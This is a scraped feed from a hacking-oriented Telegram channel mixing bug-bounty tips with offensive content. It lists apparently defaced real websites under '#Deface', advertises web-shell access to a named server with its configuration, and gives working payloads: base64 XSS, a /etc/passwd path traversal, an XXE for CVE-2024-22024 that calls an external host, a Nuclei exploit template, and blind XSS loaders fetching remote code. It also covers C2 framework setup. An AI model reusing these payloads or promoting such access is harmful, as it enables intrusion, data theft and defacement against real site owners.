NetProbe: Network Probe
๐ฌ
NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.
๐ Features:
โช๏ธ Scan for devices on a specified IP address or subnet
โช๏ธ Display the IP address, MAC address, manufacturer, and device model of discovered devices
โช๏ธ Live tracking of devices (optional)
โช๏ธ Save scan results to a file (optional)
โช๏ธ Filter by manufacturer (e.g., 'Apple') (optional)
โช๏ธ Filter by IP range (e.g., '192.168.1.0/24') (optional)
โช๏ธ Scan rate in seconds (default: 5) (optional)
๐ผ Installation:
๐ป Usage:
๐ Example:
๐ธ Github
โฌ๏ธ Download
๐
#Python #Network #Scanner #Vulnerability #Tools
โ โ โ โ โ โ โ โ โ โ
๐ค T.me/BugCod3BOT
๐ฃ T.me/BugCod3
NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.
cd NetProbe
pip install -r requirements.txt
python3 netprobe.py โhelp
python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l
BugCod3#Python #Network #Scanner #Vulnerability #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
โก4โค3๐ฅ1
https://ipebs.in/
https://govacancia.com/
http://rivieravoyages.com/
http://mail.rivieravoyages.com/
https://stavolink.com/
https://tridentresortsholidays.com/
https://deparagon.com/
http://woosquare.deparagon.com/index1707261924.html
http://ebaymasterkey.deparagon.com/
http://masterkey.deparagon.com/
http://multi.deparagon.com/
http://search.deparagon.com/
http://smspress.deparagon.com/
Country:
#Deface
Please open Telegram to view this post
VIEW IN TELEGRAM
โก3โค2๐ฅ1
PHP: 8.1.27
Safe Mode: OFF
ServerIP: 213.158.95.90 [๐ฎ๐น ]
HDD: Total:1536.00 GB
Free:1322.97 GB [86%]
useful:--------------
Downloader: --------------
Disable Functions: All Functions Accessible
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : OFF
Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE
SoftWare: nginx/1.22.0
๐ Link
Enjoy...โญ๏ธ
#Shell
โ โ โ โ โ โ โ โ โ โ
๐ฅ
๐ฃ T.me/BugCod3
๐ฃ T.me/LearnExploit
Safe Mode: OFF
ServerIP: 213.158.95.90 [
HDD: Total:1536.00 GB
Free:1322.97 GB [86%]
useful:--------------
Downloader: --------------
Disable Functions: All Functions Accessible
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : OFF
Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE
SoftWare: nginx/1.22.0
Enjoy...
#Shell
0Day.Today Please open Telegram to view this post
VIEW IN TELEGRAM
โก4โค1๐1๐ฅ1
I found a url like this :
encoded javascript:alert("Xss by vikas") to base64 like :
Now the new url is like this :
https://domain.io/redirect?`url=amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=`
๐ Twitter
#bugbounty #xss #infosec
โ โ โ โ โ โ โ โ โ โ
๐ค T.me/BugCod3BOT
๐ฃ T.me/BugCod3
https://domain.io/redirect?url=some_base_64_encoded_stringencoded javascript:alert("Xss by vikas") to base64 like :
amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=Now the new url is like this :
https://domain.io/redirect?`url=amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=`
#bugbounty #xss #infosec
Please open Telegram to view this post
VIEW IN TELEGRAM
โค2๐ฅ2โก1๐คฃ1
ALWAYS test 404 Not Found in Bug Bounties!
๐ Medium
๐ Freedium
#Writeup
โ โ โ โ โ โ โ โ โ โ
๐ค T.me/BugCod3BOT
๐ฃ T.me/BugCod3
#Writeup
Please open Telegram to view this post
VIEW IN TELEGRAM
โค5โก1๐1๐ฅ1
Payload:
".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"#bugbountytips #bugbounty #CyberSecurity
Please open Telegram to view this post
VIEW IN TELEGRAM
โค3๐ฅ2โคโ๐ฅ1โก1
CVE-2024-22024
XXE on Ivanti Connect Secure
โ ๏ธ payload encoded base64:
send it to:
#bugbountytips #cve #Ivanti
โ โ โ โ โ โ โ โ โ โ
๐ค T.me/BugCod3BOT
๐ฃ T.me/BugCod3
XXE on Ivanti Connect Secure
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>send it to:
127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm#bugbountytips #cve #Ivanti
Please open Telegram to view this post
VIEW IN TELEGRAM
โก2โค2๐ฅ1
JSON Smuggling: A far-fetched intrusion detection evasion technique
๐ Medium
#infosec #cybersecurity #blueteam
โ โ โ โ โ โ โ โ โ โ
๐ค T.me/BugCod3BOT
๐ฃ T.me/BugCod3
#infosec #cybersecurity #blueteam
Please open Telegram to view this post
VIEW IN TELEGRAM
โก2โค1๐ฅ1
Nuclei PoC for Ivanti XXE (CVE-2024-22024)
#Nuclei #Templates #PoC #XXE
โ โ โ โ โ โ โ โ โ โ
๐ค T.me/BugCod3BOT
๐ฃ T.me/BugCod3
id: CVE-2024-22024
info:
name: Ivanti Connect Secure - XXE
author: watchTowr
severity: high
description: |
Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.
impact: |
Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information or remote code execution.
remediation: |
Apply the latest security patches or updates provided by Ivanti to fix the XXE vulnerability.
reference:
- https://labs.watchtowr.com/are-we-now-part-of-ivanti/
- https://twitter.com/h4x0r_dz/status/1755849867149103106/photo/1
metadata:
max-request: 1
vendor: ivanti
product: "connect_secure"
shodan-query: "html:\"welcome.cgi?p=logo\""
tags: cve,cve2024,kev,xxe,ivanti
variables:
payload: '<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM
"http://{{interactsh-url}}/x"> %watchTowr;]><r></r>'
http:
- raw:
- |
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
SAMLRequest={{base64(payload)}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: word
part: body
words:
- '/dana-na/'
- 'WriteCSS'
condition: and
# digest: 490a0046304402206a39800bff0d9ca85a05e3686a0e246f8d5504a38e8501a1d7e8684ae6f2853002205ba7c74bb1f99cacf693e8a5a1cd429dcd7e52fab188beb8c95b934e4aabcd57:922c64590222798bb761d5b6d8e72950
#Nuclei #Templates #PoC #XXE
Please open Telegram to view this post
VIEW IN TELEGRAM
โก2๐ค2โค1โคโ๐ฅ1๐1
https://www.sergiocardozo.paineladvocacia.com/
http://acesso.paineladvocacia.com/
https://maioranoadvocacia.com/
http://smart.wecaninfotech.com/
https://tropicanarestaurants.com/index.php
https://madein.az/index.html
Country:
#Deface
Please open Telegram to view this post
VIEW IN TELEGRAM
โก2โค1๐ฅ1
Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers. The Empire server is written in Python 3 and is modular to allow operator flexibility. Empire comes built-in with a client that can be used remotely to access the server. There is also a GUI available for remotely accessing the Empire server, Starkiller.
cd Empire
./setup/checkout-latest-tag.sh
./setup/install.sh
#Hacktoberfest #C2 #Redteam #Infrastructure
Please open Telegram to view this post
VIEW IN TELEGRAM
โก2โค1๐1๐ฅ1
Adding 2 new blind XSS payloads to the XSS scanner payload vault ๐
AND
#XSS #Bugbounty #Tip
โ โ โ โ โ โ โ โ โ โ
๐ค T.me/BugCod3BOT
๐ฃ T.me/BugCod3
'"><Svg Src=//{CANARY_TOKEN}/s OnLoad=import(this.getAttribute('src')+0)>AND
'"><Img Src=//{CANARY_TOKEN}/x Onload=import(src+0)>#XSS #Bugbounty #Tip
Please open Telegram to view this post
VIEW IN TELEGRAM
โก5โค2๐ฅ1
Linux for Hackers: LINUX commands you need to know
โฌ๏ธ Download
#linux #hacker #video
โ โ โ โ โ โ โ โ โ โ
๐ฃ T.me/BugCod3
๐ฃ T.me/LearnExploit
#linux #hacker #video
Please open Telegram to view this post
VIEW IN TELEGRAM
โก2โค1๐ฅ1
311138#Burpsuite #Pro #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
โก4๐ฅ2โค1๐1๐คฃ1
https://tysonmcguffin.com/index.html
https://bilberrybears.com/
https://flighttouch.com/
https://www.cameratouch.flighttouch.com/
https://mail.flighttouch.com/
Country:
#Deface
Please open Telegram to view this post
VIEW IN TELEGRAM
โค3โก3๐ฅ1
This h1finder.sh is script which collect all program names and then collect all assets and save it into wild and non-wild domains
You can get your API key from
cd h1-asset-fetcher
chmod +x h1finder
mv h1finder /usr/bin/
h1finder -t <token> -u <username> -b <true/false>
BugCod3#BugBounty #Tips #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
โก3โค1๐1๐ฅ1
Query Fofa:
body="/wp-content/themes/bricks/"#BugBounty #Tips #Nuclei #Template
Please open Telegram to view this post
VIEW IN TELEGRAM
โก3โค2๐1๐ฅ1
This media is not supported in your browser
VIEW IN TELEGRAM
Example query:
https://shodan.io/search/facet?query=hostname%3A*.apnic.net&facet=ipDownload source page
Regex:
grep '<strong>' shodan.html | cut -d '>' -f 4 | cut -d '<' -f 1#BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
โก3โค1๐ฅ1
for searching leaked keys and secrets is a must-have. Here is how I was able to find a P1 recently using BurpSuite, The leaked secrets allowed me to see some employee related juicy info.
BugCod3#BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
โก4โค2๐ฅ2